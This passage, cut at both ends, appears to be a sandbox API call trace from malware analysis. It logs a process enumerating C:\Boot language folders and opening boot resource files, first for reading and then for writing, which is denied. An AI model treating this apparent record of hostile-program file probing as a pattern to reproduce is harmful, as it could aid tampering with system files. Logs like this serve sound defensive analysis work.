InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.800] AreFileApisANSI () returned 1 [0083.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nb-NO\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.801] AreFileApisANSI () returned 1 [0083.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 30 [0083.801] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.801] GetFileType (hFile=0x340) returned 0x1 [0083.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.801] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.801] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.801] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.802] CloseHandle (hObject=0x340) returned 1 [0083.802] AreFileApisANSI () returned 1 [0083.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 30 [0083.802] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.802] GetLastError () returned 0x5 [0083.802] GetLastError () returned 0x5 [0083.802] SetLastError (dwErrCode=0x5) [0083.802] GetLastError () returned 0x5 [0083.802] SetLastError (dwErrCode=0x5) [0083.802] GetLastError () returned 0x5 [0083.802] SetLastError (dwErrCode=0x5) [0083.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.802] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.803] AreFileApisANSI () returned 1 [0083.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nb-NO\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nb-NO\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.804] AreFileApisANSI () returned 1 [0083.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0083.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nb-NO\\memtest.exe.mui") returned 30 [0083.804] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.804] GetFileType (hFile=0x340) returned 0x1 [0083.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.804] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.804] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.805] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.805] CloseHandle (hObject=0x340) returned 1 [0083.805] AreFileApisANSI () returned 1 [0083.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0083.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nb-NO\\memtest.exe.mui") returned 30 [0083.805] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.805] GetLastError () returned 0x5 [0083.805] GetLastError () returned 0x5 [0083.806] SetLastError (dwErrCode=0x5) [0083.806] GetLastError () returned 0x5 [0083.806] SetLastError (dwErrCode=0x5) [0083.806] GetLastError () returned 0x5 [0083.806] SetLastError (dwErrCode=0x5) [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.806] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧놠")) returned 0 [0083.806] FindClose (in: hFindFile=0x77f90 | out: hFindFile=0x77f90) returned 1 [0083.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0083.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.807] AreFileApisANSI () returned 1 [0083.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nl-NL", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nl-NL", lpUsedDefaultChar=0x0) returned 14 [0083.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.807] AreFileApisANSI () returned 1 [0083.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0083.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\nl-NL") returned 14 [0083.807] CreateFileW (lpFileName="C:\\Boot\\nl-NL" (normalized: "c:\\boot\\nl-nl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.807] GetLastError () returned 0x5 [0083.807] GetLastError () returned 0x5 [0083.807] SetLastError (dwErrCode=0x5) [0083.807] GetLastError () returned 0x5 [0083.807] SetLastError (dwErrCode=0x5) [0083.807] GetLastError () returned 0x5 [0083.808] SetLastError (dwErrCode=0x5) [0083.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.808] AreFileApisANSI () returned 1 [0083.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0083.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\nl-NL") returned 14 [0083.808] CreateFileW (lpFileName="C:\\Boot\\nl-NL" (normalized: "c:\\boot\\nl-nl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.808] GetLastError () returned 0x5 [0083.808] GetLastError () returned 0x5 [0083.808] SetLastError (dwErrCode=0x5) [0083.808] GetLastError () returned 0x5 [0083.808] SetLastError (dwErrCode=0x5) [0083.808] GetLastError () returned 0x5 [0083.808] SetLastError (dwErrCode=0x5) [0083.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.808] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0083.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.809] FindFirstFileExW (in: lpFileName="C:\\Boot\\nl-NL\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x782d0 [0083.809] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.809] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0083.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.809] RtlAllocateHeap 